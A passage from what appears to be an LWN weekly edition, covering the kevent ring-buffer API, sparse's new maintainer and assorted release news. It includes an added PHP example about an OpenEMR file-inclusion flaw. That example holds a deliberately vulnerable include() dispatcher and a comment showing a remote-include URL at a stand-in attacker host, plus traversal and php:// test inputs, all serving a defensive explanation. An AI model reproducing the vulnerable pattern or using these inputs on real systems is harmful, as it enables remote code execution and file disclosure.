                          __u64 timeout, struct ukevent *buf,
                          unsigned flags);

This system call will wait until at least min_nr events are ready for consumption, then copy up to max_nr completed events into buf. The call will return early, however, if timeout nanoseconds pass before min_nr events are signaled. The current documentation for kevents says that an indefinite wait can be had by passing -1 for timeout - slightly strange, given that timeout is an unsigned quantity. It would not be surprising to see some sort of KEVENT_WAIT_FOREVER value defined for that purpose instead.

The biggest changes can be found in the kevent ring buffer code which, last time we looked, was rather awkward to use. The previous implementation also placed the ring buffer in nailed-down kernel memory, potentially opening the system up to denial of service problems. So, in the new implementation, the ring buffer is kept entirely in user space. The application simply allocates an array of the desired size with the following type:

    struct kevent_ring
    {
        unsigned int    ring_kidx;
        struct ukevent  event[0];
    };

The actual number of events to be stored in the ring is determined by the application. The kevent subsystem must be told about this ring with:

    int kevent_ring_init(int fd, struct kevent_ring *ring, 
                         unsigned int num);

where num is the number of ukevent structures in the ring. This call will remember the ring's address and size, and set ring_kidx - the index of the entry where the kernel will store the next completed event - to zero.

There are a few things to be aware of when working with the kevent ring. One is that there is no place in this data structure to track which event the application should consume next; the application must store that index elsewhere. There also appears to be no way to disconnect or resize the ring buffer without simply closing the event file descriptor and starting over; an attempt to replace one ring with another will fail. Finally, the application must tell the kernel to put events into the ring with:

    int kevent_wait(int fd, unsigned int num, __u64 timeout);

This system call will wait until at least one event is available, then copy up to num events into the ring buffer. Once the events are copied, the kernel considers them to be consumed and will forget about them (or requeue them if the event so requests). The application can work through the events at leisure - stopping before hitting the current ring_kidx value - with no further system calls required.
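As an added illustration of the ring handling just described (not code from the kevent patch), here is the user-space side with a stand-in for kevent_wait() so that it runs on any system: the application keeps its own consumer index, works through entries until it reaches ring_kidx, wraps at num, and caps the number of events it asks for so that a completely full ring can never be mistaken for an empty one. The ukevent field layout, the fake_kevent_wait() function and the sample event stream are assumptions made for the example.

```c
/* Added example of consuming the kevent ring described above; not code
 * from the kevent patch.  Assumptions: a simplified struct ukevent,
 * fake_kevent_wait() standing in for the kevent_wait() system call, and a
 * constructed stream of five completed events. */
#include <stdio.h>
#include <stdlib.h>

struct ukevent {                 /* assumed, simplified field layout */
	unsigned int id;
	unsigned int type;
};

struct kevent_ring {             /* layout from the patch, which spells it event[0] */
	unsigned int ring_kidx;  /* kernel-owned: next slot it will fill */
	struct ukevent event[];
};

/* Application state.  The ring has no room for a consumer index, so the
 * application keeps uidx itself. */
struct ring_reader {
	struct kevent_ring *ring;
	unsigned int num;        /* entries in ring, as passed to kevent_ring_init() */
	unsigned int uidx;       /* next entry the application will consume */
};

static struct kevent_ring *ring_alloc(unsigned int num)
{
	struct kevent_ring *r = calloc(1, sizeof(*r) + num * sizeof(struct ukevent));

	if (!r)
		abort();
	return r;                /* kevent_ring_init() would zero ring_kidx */
}

/* Stand-in for the kernel half of kevent_wait(): copy up to `want` pending
 * events into the ring at ring_kidx, wrapping at num, and forget them.  The
 * real call also blocks until at least one event is ready. */
static unsigned int fake_kevent_wait(struct ring_reader *rd, const struct ukevent *pending,
				     unsigned int npending, unsigned int want)
{
	unsigned int n = npending < want ? npending : want;

	for (unsigned int i = 0; i < n; i++) {
		rd->ring->event[rd->ring->ring_kidx] = pending[i];
		rd->ring->ring_kidx = (rd->ring->ring_kidx + 1) % rd->num;
	}
	return n;
}

/* Work through everything the kernel stored since the last pass, with no
 * system call: stop when uidx catches up with ring_kidx. */
static unsigned int drain_ring(struct ring_reader *rd, void (*handle)(const struct ukevent *))
{
	unsigned int handled = 0;

	while (rd->uidx != rd->ring->ring_kidx) {
		handle(&rd->ring->event[rd->uidx]);
		rd->uidx = (rd->uidx + 1) % rd->num;
		handled++;
	}
	return handled;
}

static unsigned int last_id;

static void handle_event(const struct ukevent *e) { last_id = e->id; }
static unsigned int last_id_seen(void) { return last_id; }

/* Push a constructed stream of five events through a ring of ring_size
 * entries, asking for at most `want` per wait.  Returns the number of
 * events the application actually handled. */
static unsigned int run_stream(unsigned int ring_size, unsigned int want)
{
	const struct ukevent sample[5] = { {1, 0}, {2, 0}, {3, 0}, {4, 0}, {5, 0} };
	unsigned int left = 5, handled = 0;
	struct ring_reader rd;

	if (ring_size == 0 || want == 0)
		return 0;
	rd.ring = ring_alloc(ring_size);
	rd.num = ring_size;
	rd.uidx = 0;
	while (left) {
		unsigned int got = fake_kevent_wait(&rd, sample + (5 - left), left, want);

		left -= got;
		handled += drain_ring(&rd, handle_event);
	}
	free(rd.ring);
	return handled;
}

int main(void)
{
	/* Two indices cannot tell a full ring from an empty one: if the kernel
	 * fills all num slots, ring_kidx wraps back onto uidx and the drain
	 * sees nothing.  Asking for at most num - 1 events per wait, having
	 * drained first, keeps that state unreachable. */
	printf("ring of 4, ask for 3: handled %u of 5\n", run_stream(4, 3));
	printf("ring of 4, ask for 4: handled %u of 5\n", run_stream(4, 4));
	return 0;
}
```

The second run loses four events: the kernel copies them, considers them consumed, and the application's equality test never sees them. Capping the request at one less than the ring size (or keeping an explicit count of outstanding entries) is the application's responsibility, since the ring structure itself gives it nothing to go on.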

The current API seems to have made most of the people who are paying attention happy - though it has been a little while since Ulrich Drepper, an important player, has chimed in. In the past, he has been unhappy about the timeout parameter (preferring that the interface use an absolute timespec value rather than a relative value). Ulrich has also suggested that the blocking system calls could use a version which specifies an event mask, much like the recently added ppoll() and pselect() system calls. He points out that, while it is possible to receive signals as kevents, some applications will certainly still use traditional signals, with their traditional atomicity problems.

So there may be a few remaining issues to take care of before the kevent API is merged into the mainline kernel - and consequently set in stone. But there is apparent progress in that direction, and the number of developers showing interest in this API appears to be on the increase. It may not be too many more kernel cycles before Linux has a unified event interface of its very own.

Comments (2 posted)

Sparse gets a maintainer

The "sparse" utility has long been one of Linux's best-kept secrets. It is a static analysis tool which can find a wide variety of bugs in the kernel code base; sparse is a useful tool, but it can be surprisingly hard to find. It has never had a web page, and almost no distributions package it. Interested users must, instead, track down the git tree or Dave Jones's snapshot directory.

Sparse was originally written by Linus Torvalds, but he has not done much with it for a while, and he recently suggested that somebody else should take it over:

Anyway, I suspect it would be better if people didn't consider me the maintainer for sparse, simply because it does the things I really cared about, and as a result I'm not really very active.

As a result of this discussion, sparse has a new maintainer: Josh Triplett. Josh started things off with sparse 0.1, the first-ever sparse release with a version number. He has set up a new git tree for sparse, and, even, a sparse web page.

Josh was kind enough to answer some questions posed by your editor. It turns out that he has been working with sparse for a while; it was part of his PhD work, where he enhanced it to be able to verify proper use of the read-copy-update (RCU) primitives. That work continued at IBM over the summer, where he was able to work on RCU verification with Paul McKenney.

As a result, his first priority for sparse in the near future is the continuation of the RCU work. This effort is also expanding into locking verification in general; some of the necessary annotations and resulting fixes have gone into the 2.6.18 and 2.6.19-rc kernels. Josh also plans to work on the elimination of false positives and on noise reduction in general. Then there are various patches from other developers which have been floating around for a while and really need to be merged into the sparse mainline.

In terms of project management, Josh says:

I plan to continue making regular Sparse releases, and I'd like to get Sparse packaged in various distributions, at least in their "experimental" sections or equivalent. Any potential distribution packagers, feel free to join the linux-sparse list, and let me know what I can do to help or to get things going more smoothly.

Getting sparse into distributions could only help increase its use - and bring about a corresponding reduction in bugs in shipped code. This will be especially true if Josh succeeds in another one of his goals: expanding sparse usage beyond the kernel into user-space projects. X.org seems like it could be an early sparse adopter.

Longer-term, Josh wants to look at more advanced techniques which can look at larger chunks of a program and find potential bugs. Part of this effort will require attracting other researchers interested in static analysis to the sparse platform. Says Josh:

I feel that several classes of bugs exist in the Linux kernel and in userspace code which simply should not exist, because the tools exist to find and eliminate almost all of them. This includes bugs like "scheduling while atomic", __init-related bugs, errors on error paths, and many locking-related bugs.

One can only imagine that free software users all over are wishing Josh the best of luck in his effort to track down and get rid of all those unnecessary bugs.

Comments (8 posted)

Page editor: Jonathan Corbet

Distributions

News and Editorials

Get more Science into your Distribution

There are a number of specialty distributions with scientific applications. Generally they come as live CDs with a few handpicked applications, like the Quantian Scientific Computing Environment, or BioBrew Linux. What if you want a broader range of scientific applications? The packages are there, maybe in your distribution's repositories already; but if you just want to get going without spending a lot of time with {emerge, yum, apt-get, conary, etc.} there are two distribution-specific efforts to make it easy.

Mandriva is joining with Scilab, a consortium managed by INRIA (French National Institute for Research in Computer Science and Control). According to this announcement, the Scilab open source numerical computation platform will be integrated into the Mandriva Linux 2007 Discovery, Powerpack and Powerpack+ editions.

Ubuntu 6.06 LTS users looking for more scientific applications will want to take a look at Scibuntu. Scibuntu is a script that adds scientific programs and other tools to your Ubuntu desktop. Most of these programs are already in the Ubuntu repositories, but Scibuntu collects them for you, installs them on your computer, and fetches a few more from other places.

Comments (19 posted)

New Releases

andLinux Prebeta based on Ubuntu

andLinux has released PreBeta, based on Ubuntu's Edgy Eft. andLinux is a complete Linux system designed for developing applications; it runs seamlessly on Windows 2000-based systems using CoLinux. The PreBeta features many updates and enhancements over the previous "Proof of Concept" version. Click below for details.

Full Story (comments: 1)

Debian GNU/Linux 3.1 updated

The Debian project has announced the fourth update of its stable distribution Debian GNU/Linux 3.1 (codename `sarge'). "This update mainly adds corrections for security problems to the stable release, along with a few adjustments to serious problems. Those who frequently update from security.debian.org won't have to update many packages and most updates from security.debian.org are included in this update."

Full Story (comments: none)

New distribution: gNewSense 1.0

The Free Software Foundation has sent out a press release on the launch of the gNewSense distribution, based on Ubuntu. "With the avowed goal of providing a completely free distribution - one without non-free kernel binary 'blobs' or any other non-free software, the Free Software Foundation has announced sponsorship of the project. Ted Teah, FSF's free software directory maintainer explained, 'With all the kernel firmware and restricted repositories removed, and the reliance on Ubuntu's proprietary distribution management tool Launchpad gone, this distribution is the most advanced GNU/Linux distribution that has a commitment to be 100% free.'"

Full Story (comments: 40)

Announcing NetBSD 3.1

The NetBSD Project has announced the availability of NetBSD 3.1. This is the first feature update of the 3.0 branch. Changes include bugfixes, critical security updates and new minor features like new drivers.

Comments (none posted)

Distribution News

rPath Announces Support of Xen 3.0.3

rPath has announced the ability to create virtual appliances that run on the Xen 3.0.3 hypervisor using rPath's rBuilder.

Full Story (comments: none)

Canonical and Sun Expand Presence in the Enterprise

Sun Microsystems and Canonical have announced that the open-source Java Enterprise Edition 5 application server (specifically the GlassFish Community reference implementation) will be just an apt-get away for Ubuntu users. Also in this press release: "Canonical furthered its push into the enterprise by announcing imminent certification and support for Ubuntu on Sun's x64 (x86, 64-bit) hardware, powered by AMD Opteron(TM) processors."

Comments (none posted)

GNU-Darwin and SEDarwin

GNU-Darwin is a free, BSD-based distribution. Darwin is Apple's base for Mac OS X, without the proprietary bits. Add the ports system and package management from FreeBSD and all your favorite GNU tools and you have GNU-Darwin, a free Mac OS X compatible distribution for PowerPC and x86. The project has recently made available a new source archive.

A related project has also surfaced; SEDarwin, a port of the TrustedBSD Mandatory Access Control Framework to Darwin. From the announcement: "The October 31 snapshot includes the most recent SELinux kernel and user space components available. We are still working to adapt the Tresys reference policy for Apple's System, but the kernel and user space components are largely complete."

Comments (1 posted)

A Makeover for the MEPIS Desktop

MEPIS has announced a call for graphic designers. "From time to time, we hear from users who say that the look of the MEPIS desktop isn't on par with the quality of the MEPIS operating system. We tend to agree that the desktop could use a little makeover. The problem is that we just don't have the money to hire a professional to design a desktop, nor do we have the time to work on it ourselves. So this is a call to you graphic designers out there, and anybody else who would like to tackle the MEPIS desktop makeover. Please give us your comments and ideas, and also indicate whether you'd be interested in working on this project."

Comments (none posted)

New Distributions

Lintrack

Lintrack is a small, easy to configure and highly integrated GNU/Linux distribution for routers, firewalls, network access servers, content filters and more. It is targeted especially to small and medium-sized wireless Internet service providers. Lintrack joins our list at version 2.0, codenamed "Hockenheim". See the review section below for a review of Lintrack.

Comments (none posted)

Distribution Newsletters

Debian Weekly News - October 31st, 2006

The Debian Weekly News is back! This edition looks at the DebianHelp site, some weekly summaries by Joey Hess, a repository with ported applications for the Nokia 770 web tablet, source-less binary objects in the Debian Linux 2.6 packages, Practical Linux Day, videos of the Internationalisation Meeting, DebConf6 videos, and several other topics.

Full Story (comments: none)

Fedora Weekly News Issue 65

The Fedora Weekly News covers Fedora Core 6 Common Issues, Fedora Will Never Compromise, Cooperative Bug Isolation for FC6, Fedora speaking at FactFEST, Building and leading FOSS communities, Review: Prime time Fedora, Review: Innovations Continue, Review: Revisiting Fedora, and more.

Comments (none posted)

Gentoo Weekly Newsletter

The Gentoo Weekly Newsletter for October 30, 2006 looks at XMMS removal, #gentoo-uk information, CJK/Scheme/Turkish GWN translation teams looking for help, and other topics.

Comments (none posted)

Ubuntu Weekly News #20

The Ubuntu Weekly Newsletter for the week of October 22 - 28, 2006 covers Ubuntu 6.10, Firefox 2.0, topics chosen for Mountain View, last uploads to Edgy and much more.

Full Story (comments: none)

DistroWatch Weekly, Issue 176

The DistroWatch Weekly for November 6, 2006 is out. "Novell drops a bombshell on the Linux community. Signing an exclusive patent-protection agreement with Microsoft, a company that has been trying to discredit Linux at every opportunity, Novell claims that the deal is great for its customers. The community, however, is not impressed. In the meantime, CentOS, a project that provides a free clone of Red Hat Enterprise Linux, voices its concerns over the recently launched Oracle Enterprise Linux. In other news: find out how the Fedora code names are generated, check out the 100% "libre" gNewSense distribution, and install a bunch of scientific applications on your Ubuntu box with just one command. In our web log feature, we revisit Mandriva Linux 2007 and give away four boxes of its PowerPack edition. Finally, readers' input is sought for a dilemma about the increasingly aggressive linking of several Linux distributions to DistroWatch."

Comments (none posted)

Package updates

Fedora updates

Updates for Fedora Core 6: libxslt (upstream release 1.1.18), scim-bridge (update to 0.4.7), shadow-utils (bug fixes), evolution (update to 2.8.1.1), evolution-connector (update to 2.8.1), gnucash (update to 2.0.2), gtkhtml3 (update to 3.12.1), hplip (debugging patch), evolution-data-server (update to 1.8.1), bug-buddy (add extra information to autogenerated bug reports), pygtk2 (update to 2.10.3), rhgb (bug fix), shadow-utils (bug fixes), m17n-db (bug fixes), system-config-kickstart (bug fixes), m17n-db (bug fix), cvs (bug fix), bind (bug fixes), at (daylight-saving patch), nautilus (dynamically use beagle), yelp (dynamically use beagle), beagle (support dynamic use), setools (bump for FC6), selinux-policy (bump for FC6), gjdoc (bug fix), dvd+rw-tools (new version 7.0), htmlview (bug fix), vorbis-tools (fix charset conversion), yelp (fix crashes, improve info and man support), initscripts (bug fixes), python (update to python 2.4.4), python-docs (update to python 2.4.4), swig (determine architecture correctly), checkpolicy (latest update from NSA), cups (D-Bus signal fix), autofs (deal with changed semantics of mkdir in recent kernels), squid (stable upstream version), kdebase (rebuild), doxygen (update to 1.5.1).

Updates for Fedora Core 5: system-config-users (updated translations), kudzu (backport xen support), xen (update to xen-3.0.3), cvs (bug fix), at (daylight-saving patch), system-config-date (updated translations), gamin (bug fixes), sendmail (bug and security fixes), bind (bug fixes), cups (D-Bus signal fix), kdebase (KWin focus issue).

Comments (none posted)

Mandriva updates

Updates for Mandriva Linux 2007.0: jabber (properly initialize OpenSSL library).

Comments (none posted)

rPath updates

Updates for rPath Linux 1: rmake (bug fixes).

Comments (none posted)

Trustix updates

Updates for Trustix Secure Linux 2.2 & 3.0: imagemagick, libmcrypt, perl-dbd-pg, proftpd, spamassassin (various bug fixes).

Comments (none posted)

Ubuntu updates

Updates for Ubuntu 6.10: gfxboot-theme-ubuntu 0.2.10 (bug fix), ladder.app_1.0-2 (rebuild against latest libgnustep-gui-dev), lapispuzzle.app_1.0-2 (rebuild against latest libgnustep-gui-dev), displaycalibrator.app_0.7-3 (rebuild against latest libgnustep-gui-dev), dbconfig-common_1.8.25 (bug fixes), latex.service_0.1-3 (rebuild against latest libgnustep-gui-dev), cynthiune.app_0.9.5-4 (rebuild against latest libgnustep-gui-dev), dist-upgrader_20061031.1838 (bug fixes).

Updates for Ubuntu 6.06 LTS: there were 139 automated language-pack updates.

Comments (none posted)

Newsletters and articles of interest

How To Compile A Kernel - The Ubuntu Way (HowtoForge)

HowtoForge helps Ubuntu users build a custom kernel. "Each distribution has some specific tools to build a custom kernel from the sources. This article is about compiling a kernel on Ubuntu systems. It describes how to build a custom kernel using the latest unmodified kernel sources from www.kernel.org (vanilla kernel) so that you are independent from the kernels supplied by your distribution. It also shows how to patch the kernel sources if you need features that are not in there."

Comments (none posted)

Distribution reviews

Fedora Core 6 review (Software In Review)

Just in case any of you were looking for a thoroughly hostile review of Fedora Core 6: here's one in Software In Review. "The Fedora Project has failed six consecutive times to produce a viable desktop operating system. I say pack up, move on, and let Fedora Core die, but remember it fondly as the last of the holdouts from an era when desktop GNU/Linux meant missing out on most Web media while struggling to get network drivers installed and configured." The reviewer, clearly, would rather be running a proprietary system.

Comments (63 posted)

Knoppix 5.0.1: A solid live DVD (Linux.com)

Linux.com reviews the Knoppix 5.0.1 live CD/DVD distribution. "In the changes department, users of older Knoppix releases will appreciate the newer kernel, newer Xorg, even better hardware detection, newer KDE and GNOME, newer (and better) installer, and, generally speaking, newer everything. The amount of included software really can't be quantified in just words and figures. You get bundles of software for every KDE menu category, ranging from Education/Edutainment, Games, Toys, Multimedia, and Internet to Graphics, Development, Utilities, and System Tools."

Comments (1 posted)

Lintrack: Linux for Internet Service Providers (polishlinux.org)

Polishlinux.org reviews Lintrack. "Lintrack is a new GNU/Linux distribution for routers, firewalls, network access servers and more. It features new approaches to several areas such as system configuration and integration, but has many ideas inspired by traditional Linux distributions as well. I would like to introduce you to the project and provide step-by-step instructions for configuring Lintrack as a simple OSPF backbone router and a PPPoE network access server."

Comments (none posted)

Page editor: Rebecca Sobol

Development

Adobe donates Flash Player Scripting Engine to Mozilla

During the 2006 Web 2.0 Summit, Adobe Systems Incorporated and the Mozilla Foundation jointly announced the contribution of the source code for the Adobe ActionScript Virtual Machine, a component of the Adobe Flash Player, to the Mozilla Foundation. The software will be renamed the Tamarin Project and will be released under the standard Mozilla tri-license set (MPL/GPL/LGPL). From the announcement:

The Tamarin project will implement the final version of the ECMAScript Edition 4 standard language, which Mozilla will use within the next generation of SpiderMonkey, the core JavaScript engine embedded in Firefox®, Mozilla’s free Web browser. As of today, developers working on SpiderMonkey will have access to the Tamarin code in the Mozilla CVS repository via the project page located at www.mozilla.org/projects/tamarin/ . Contributions to the code will be managed by a governing body of developers from both Adobe and Mozilla.

“Adobe’s work on the new virtual machine is the largest contribution to the Mozilla Foundation since its inception,” said Brendan Eich, chief technology officer, Mozilla Corporation, and creator of JavaScript. “Now web developers have a high-performance, open source virtual machine for building and deploying interactive applications across both Adobe Flash Player and the Firefox web browser. We’re excited about joining the Adobe and Mozilla communities to advance ECMAScript.”

The aim of Tamarin is to create a standard scripting language for running interactive applications; Tamarin will work in both the Firefox browser and the Adobe Flash Player, and will adhere to an Ecma International standard. The Tamarin Project's main page states:

The goal of the "Tamarin" project is to implement a high-performance, open source implementation of the ECMAScript 4th edition (ES4) language specification. The Tamarin virtual machine will be used by Mozilla within SpiderMonkey, the core JavaScript engine embedded in Firefox®, and other products based on Mozilla technology. The code will continue to be used by Adobe as part of the ActionScript(tm) Virtual Machine within Adobe® Flash® Player.

The Tamarin FAQ suggests that Tamarin will improve the performance of the Firefox browser:

AVM2, as currently shipping in Adobe Flash Player 9, was built from the ground up to work with the next generation of ActionScript. The new virtual machine is designed to deliver the performance and features to support the needs of rich Internet application developers. Source code from AVM2 being contributed to the Tamarin project implements ECMAScript 4th edition language features such as namespaces, classes, and optional strongly typed variables, and includes a Just In Time (JIT) compiler that translates ActionScript bytecode to native machine code for maximum execution speed.

and:

Adobe's contribution of source code from the ActionScript Virtual Machine to the Tamarin project accelerates the ability of developers to create and deliver richer, more interactive and engaging experiences that work across multiple platforms. Specifically, developers will be able to leverage the Tamarin code to create web applications that perform much faster in Firefox.

The FAQ also spells out the differences between JavaScript and ActionScript:

ActionScript and JavaScript are based on the same ECMA-262, 3rd edition language standard, but the libraries supporting ActionScript and JavaScript are different. For example, JavaScript is generally used within a browser and its Document Object Model (DOM) is browser window-, document-, and form-centric, while also supporting XML, event handling and Ajax. ActionScript executes within the Adobe Flash Player and its DOM is media centric, with support for animations, audio, text, and event handling.

A Linux branch of Tamarin has not yet been created, but should be available in several weeks. It will take a while before Tamarin is incorporated into Firefox; the current plan is for a release in 2008. Tamarin should be a truly useful addition to the long list of Mozilla projects.

See the initial LWN announcement for ongoing comments.

Comments (none posted)

System Applications

Database Software

MySQL 5.1.12 Beta released

Version 5.1.12 Beta of the MySQL DBMS is available for testing. "Be it that this is a Beta release, there are several incompatible changes that have happened since last release, and there's a tremendous amount of bug fixes--way too many to mention here (more than 500). We're providing a detailed list at http://dev.mysql.com/doc/refman/5.1/en/news-5-1-12.html".

Full Story (comments: none)

PostgreSQL Weekly News

The November 5, 2006 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL DBMS articles and resources.

Full Story (comments: none)

Embedded Systems

BusyBox 1.2.2.1 released

Version 1.2.2.1 of BusyBox is out with the following change: "Added compile-time warning that static linking against glibc produces buggy executables."

Comments (2 posted)

LDAP Software

LAT 1.3.1 announced

Version 1.3.1 of LAT, the LDAP Administration Tool, is out. "This is the new development branch that will eventually become 1.4."

Full Story (comments: none)

Mail Software

Mailfromd 3.0 released

Stable version 3.0 of Mailfromd is available. "Mailfromd is a general-purpose mail filtering daemon for Sendmail. It is able to filter both incoming and outgoing messages using criteria of arbitrary complexity, supplied by the administrator in the form of a script file. The program interfaces with Sendmail using Milter protocol. Mailfromd provides the following basic features: flexible programming language for writing filter scripts, sender address verification, greylisting and whitelisting, controlling mail sending rate."

Comments (none posted)

Networking Tools

OpenSSH 4.5 released

OpenSSH 4.5 has been released. This is a bug fix release, which includes a fix for a bug in the sshd privilege separation monitor.

Full Story (comments: none)

Printing

CUPS 1.2.6 released

Version 1.2.6 of the Common UNIX Printing System has been announced. "CUPS 1.2.6 fixes some compile errors, localization of the web interface on Mac OS X, bugs in the lpc and lpstat commands, and backchannel support in the parallel backend."

Comments (none posted)

Virtualization Software

Linux-VServer 2.1.1 development release available

The Linux-VServer project has announced the availability of the 2.1.1 development release. There's a lot of new stuff in this one, including a new CPU scheduler, a number of new accounting options, a couple more supported filesystems, and more; click below for the details.

Full Story (comments: none)

Web Site Development

DataparkSearch 4.43 released

Stable version 4.43 of DataparkSearch has been announced. "DataparkSearch is an Internet and Intranet search engine tool."

Comments (none posted)

Zope News

The October 1-31, 2006 edition of Zope News is out with the latest Zope web development platform information.

Comments (none posted)

Miscellaneous

Cosmo 0.5 announced

Version 0.5 of Cosmo is out with new features and bug fixes. "Cosmo is a calendar server. With your favorite calendar program (Chandler, Apple iCal, Mozilla Sunbird, or any other WebDAV or CalDAV enabled client), you can share your calendar with other people by publishing it to Cosmo. Once your calendar is stored in the server, others can subscribe to it – and even modify it, if you have given them permission."

Full Story (comments: none)

Desktop Applications

Audio Applications

Alpha release of Aliki announced

An alpha release of Aliki, a software package for room impulse response measurement, is out. "This is basically the code used at the LAC2006 workshop, cleaned up a b[i]t."

Full Story (comments: none)

Ardour 2.0 beta 7.1 released

Version 2.0 beta 7.1 of Ardour, a multi-track audio recording and editing package, is out. "After a frenetic week or two of activity, many fixes to the biggest problems seen in beta6 have been completed, and work on the backlog of issues in the bugtracker has commenced. This means you can now get 2.0 beta 7.1 as a tarball release."

Comments (none posted)

Snd-ls 0.9.7.7 and Ceres V0.46 announced

A dual release of Snd-ls 0.9.7.7, a distribution of the sound editor SND and Ceres 0.46, a sound effect and sonogram display program, has been announced.

Full Story (comments: none)

Desktop Environments

Dropline GNOME 2.16.1 released (GnomeDesktop)

GnomeDesktop has announced the availability of version 2.16.1 of dropline GNOME, a GNOME distribution for Slackware Linux. "There have been several changes since our previous major release. As part of our efforts to slim things down, the total number of packages has been decreased by almost 13%. This was possible by eliminating rebuilds of several packages that are now included in Slackware by default, and restructuring the multimedia framework to eliminate several libraries that we felt weren’t needed. Additionally, we’ve also made the decision to discontinue the inclusion of a custom X11 build with this release, as we’ve found that Slackware’s X11 6.9.0 build was more than suitable."

Comments (none posted)

GNOME Software Announcements

The following new GNOME software has been announced this week: You can find more new GNOME software releases at gnomefiles.org.

Comments (none posted)

KDE Software Announcements

The following new KDE software has been announced this week: You can find more new KDE software releases at kde-apps.org.

Comments (none posted)

Second KDE 4 Developers Snapshot Available (KDE.News)

KDE.News has announced the availability of the second KDE 4 developers snapshot. "This 3.80.2 release includes source from all the KDE modules. Application developers are strongly advised to work primarily on KDE 4 from now on. This release builds with Qt 4.2.0 and 4.2.1 (but not the 4.2 preview). Packages are available for Kubuntu and currently working through the SUSE buildservice."

Comments (none posted)

KDE Commit-Digest (KDE.News)

The November 5, 2006 edition of the KDE Commit-Digest has been announced. The content summary says: "Work on porting kdegames applications to SVG and other general improvements continues at a fast pace. Work continues on video support in KPhotoAlbum. Krita gets a new star shape tool. Okular gets support for freehand ink overlays in presentation mode. Kate gets syntax highlighting support for ActionScript and RapidQ code. Mailody continues to mature as an alternative email client. Strigi refactors to allow searching within multiple simultaneous indexes, with preliminary interoperability with Akonadi on the horizon."

Comments (none posted)

Xfce 4.4 Release Candidate 2 released

Release Candidate 2 of Xfce 4.4 has been announced. "The second and hopefully last release candidate of the Xfce 4.4 desktop is now available for download. This release focuses primarily on bug fixes and optimizations." See the changelog for more information.

Comments (none posted)

Electronics

USB FPGA Board 0.1 announced

Version 0.1 of the USB FPGA Board has been announced. "The USB FPGA Project is a set of tools that can be used to interface the PC with other hardware development boards through USB. Currently a couple different FPGA prototype boards are supported. The focus is to design and develop USB FPGA projects, providing a PC interface to different USB FPGA designs. On this site PC software, USB controller firmware, FPGA HDL, and other embedded firmware can be found."

Comments (none posted)

Games

Stars above us (WorldForge)

The WorldForge virtual world project has announced the addition of a sky display. "Something that Ember’s been missing for a long time now is a dynamic sky. Instead it has had a static sky, with a static sun, always shown as middle of the day. However, through the addition of the Caelum project from the Ogre community Ember now finally has a dynamic sky."

Comments (1 posted)

GUI Packages

PyQt v4.1 Released

Version 4.1 of PyQt, the Python bindings for Qt v4, is available. Changes include support for Qt 4.2, a new QtTest module and more.

Full Story (comments: none)

XCB 1.0 release candidate 3 now available

Release candidate 3 of XCB 1.0 is out with bug fixes and other enhancements. "libxcb provides an interface to the X Window System protocol, slated to replace the current Xlib interface. It has several advantages over Xlib".

Full Story (comments: none)

Medical Applications

OpenEMR vulnerability disclosed (LinuxMedNews)

LinuxMedNews mentions that a security vulnerability has been found in the OpenEMR medical record system. "Apparently, there are several places in OpenEMR where there is an unchecked GET parameter passed in. So OpenEMR is expecting a value on the local filesystem; however, you can pass in a URL for unexpected results."

Comments (1 posted)
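The class of bug described above, illustrated with a hypothetical PHP page dispatcher. This is an added example, not OpenEMR's code and not from the LinuxMedNews report: the parameter name page, the ALLOWED_PAGES map and the pages/ directory are assumptions. The vulnerable form passes the GET value straight into include(); the hardened form lets the client pick a key from a fixed map and never a path.

```php
<?php
// Added example (hypothetical code, not OpenEMR's): a page dispatcher
// that takes the file to include from a GET parameter.

// Vulnerable form: the client-supplied value reaches include() unchecked.
// If the interpreter allows URL includes (allow_url_fopen on PHP < 5.2,
// the separate allow_url_include directive from 5.2.0 on),
// ?page=http://attacker.example/x fetches and executes remote PHP. Even
// with URL includes disabled, ../ traversal and php:// wrappers still
// reach files the application never meant to expose.
function render_page_vulnerable(array $get): void
{
    $page = $get['page'];   // no validation at all
    include $page;          // the sink
}

// Hardened form: the request names a key, not a path. Anything that is
// not a key in the fixed map is rejected, so URLs, stream wrappers and
// ../ sequences never get near the filesystem. Stripping "http://" from
// the input is not a fix: php://, data:, ftp:// and mixed-case schemes
// all slip past such a filter, which is why an allowlist is used instead.
const ALLOWED_PAGES = [
    'summary' => 'summary.php',   // assumed page names for the example
    'history' => 'history.php',
];

function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$requested];
}

function render_page_hardened(array $get): void
{
    $target = resolve_page((string) ($get['page'] ?? ''));
    if ($target === null) {
        http_response_code(400);
        echo 'unknown page';
        return;
    }
    include $target;
}

// Defence in depth belongs in php.ini rather than in code:
//   allow_url_include = Off   ; default since PHP 5.2.0
//   allow_url_fopen = Off     ; unless something legitimately needs it

// Quick checks of the resolver (run from the command line with php -f):
assert(resolve_page('summary') === __DIR__ . '/pages/summary.php');
assert(resolve_page('http://attacker.example/x.txt') === null);
assert(resolve_page('php://filter/convert.base64-encode/resource=index.php') === null);
assert(resolve_page('../../etc/passwd') === null);
```

The ini settings are a backstop, not the fix: they block remote includes but do nothing about local file inclusion through traversal or php:// wrappers, so the allowlist in resolve_page() is what actually closes the hole. When auditing a PHP application for this pattern, grep for include, require, fopen, file_get_contents and readfile and trace each argument back to $_GET, $_POST, $_COOKIE or $_REQUEST.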

Office Suites

OpenOffice.org Newsletter

The October, 2006 edition of the OpenOffice.org Newsletter is online with the latest OpenOffice.org office suite developments.

Full Story (comments: none)

Languages and Tools

Caml

Caml Weekly News

The November 7, 2006 edition of the Caml Weekly News is out with new Caml language articles.

Full Story (comments: none)

Haskell

Haskell Weekly News

The November 8, 2006 edition of the Haskell Weekly News is online. This week brings a new release of SmallCheck and Hoogle, as well as the revival of the Monad.Reader.

Comments (none posted)

Java

Advanced Java Content Repository API (O'Reilly)

Sunil Patil introduces the Java Content Repository API on O'Reilly. "Java Content Repository (JCR) API, specified as JSR-170, is an attempt to standardize an API used for accessing content repositories. In this article, we'll talk about the advanced and optional features defined in the JCR API. We assume that you're already familiar with basic features of JCR--such as how to add a new node or property, how to configure Apache Jackrabbit, etc."

Comments (none posted)

Lisp

McCLIM 0.9.3 released

Version 0.9.3 of McCLIM, an open-source implementation of the CLIM 2 (Common Lisp Interface Manager) specification, is out with a new gtkairo backend, new features and bug fixes.

Full Story (comments: none)

Perl

Fun with Cross-Platform Shared Libraries (O'Reilly)

